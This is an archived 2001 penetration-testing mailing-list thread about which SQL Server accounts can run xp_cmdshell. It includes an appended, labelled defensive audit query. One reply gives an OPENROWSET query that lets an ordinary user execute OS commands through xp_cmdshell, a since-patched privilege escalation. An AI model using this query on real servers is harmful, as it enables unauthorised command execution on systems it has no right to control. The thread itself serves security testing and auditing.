Penetration Testing mailing list archives

RE: besides "sa" who can run xp_cmdshell


From: "Lopes, Leonardo (ISSBrazil)" <llopes () iss net>
Date: Fri, 10 Aug 2001 11:31:50 -0300

You can try this query. With this you are able to run xp_cmdshell as
another common user.
This is a vulnerability of SQL Server and MICRO$OFT has released a patch
for this.

SELECT * FROM OPENROWSET('SQLOLEDB',
    'Trusted_Connection=Yes;Data Source=MY_SERVER',
    'SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')

See you!

-----Original Message-----
From: INA (V. Brahmanandam) [mailto:BrahmanandamV () emiratesbank com]
Sent: Thursday, August 09, 2001 2:23 AM
To: 'nemo latin'
Cc: 'pen-test () securityfocus com'
Subject: RE: besides "sa" who can run xp_cmdshell


Hi,

By default, only members of the sysadmin fixed server role can execute this
extended stored procedure. However, permissions can be granted to other
users to execute stored procedures and extended stored procedures.

You can find out the current permissions by running the 'sp_helprotect' stored
procedure, which will tell you who else, apart from members of the sysadmin fixed
server role, has execute permission on this.

Regards.

Brahma
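
The permission check described in the reply above, as an added example that is not part of the original thread. It assumes the SQL Server 7.0/2000 system-table layout in master (sysprotects, sysobjects, sysusers, syslogins); column names may differ on 6.5, so treat the second query as a template to adapt.

```sql
-- Added example: audit who holds EXECUTE on xp_cmdshell without
-- logging in as each account. Assumes SQL Server 7.0/2000 system tables.
USE master
GO

-- 1. The documented route from the reply: list permissions on the procedure.
EXEC sp_helprotect 'xp_cmdshell'
GO

-- 2. The same information read from the system tables, with each grantee
--    mapped to its login and flagged when that login has a NULL password.
SELECT  u.name  AS grantee,
        l.name  AS login_name,
        CASE p.protecttype
             WHEN 204 THEN 'GRANT WITH GRANT OPTION'
             WHEN 205 THEN 'GRANT'
        END     AS permission,
        CASE WHEN l.name IS NOT NULL AND l.password IS NULL
             THEN 'YES' ELSE 'no'
        END     AS null_password
FROM    sysprotects p
JOIN    sysobjects  o ON o.id  = p.id
JOIN    sysusers    u ON u.uid = p.uid
LEFT JOIN syslogins l ON l.sid = u.sid   -- roles/groups have no login row
WHERE   o.name = 'xp_cmdshell'
  AND   p.action = 224                   -- 224 = EXECUTE
  AND   p.protecttype IN (204, 205)      -- grants only; 206 is DENY
ORDER BY null_password DESC, u.name
GO

-- 3. A grantee with no login_name is a role or group (for example public):
--    every member inherits the grant, so review membership as well.
--    Logins with a NULL password, for cross-checking:
SELECT name FROM syslogins WHERE password IS NULL
GO
```

Members of the sysadmin fixed server role do not appear in sysprotects because they do not need an explicit grant, so review that role's membership separately.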



-----Original Message-----
From:   nemo latin [mailto:nemo_old () yahoo com]
Sent:   Monday, August 06, 2001 11:33 PM
To:     pen-test () securityfocus com
Subject:        besides "sa" who can run xp_cmdshell

In our shop we have several SQL 6.5 servers with the
probe account open (null password).

I have listed and tried all the stored procedures that
it can run.  None of them are really a security
exposure.

However, I have also discovered that the DBAs have
assigned many user accounts with a null password.
This leads to the question ..

Is there a way to determine which accounts (other than
SA) can run the xp_cmdshell  ?  I think that the
ability to run this stored procedure can be assigned
to userids other than SA.

Is there a way to find them ??  Other than logging on
with each userid (that has a NULL pswd - about 30 of
them - a bad practice) and trying the xp_cmdshell.

The other holes - such as SQL injection are all
plugged (we seem to have pretty good asp coders) no
other user defined sp's seems to be vulnerable.  The
databases tables/views are being tightened up so I am
focusing on the SQL/OS interface.

I believe that the ability to run the xp_cmdshell has
been given to other accounts - and I think that I may
have to try each account !!!

Any short cuts to find out who can run this sp ??
:)

nemo_old


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
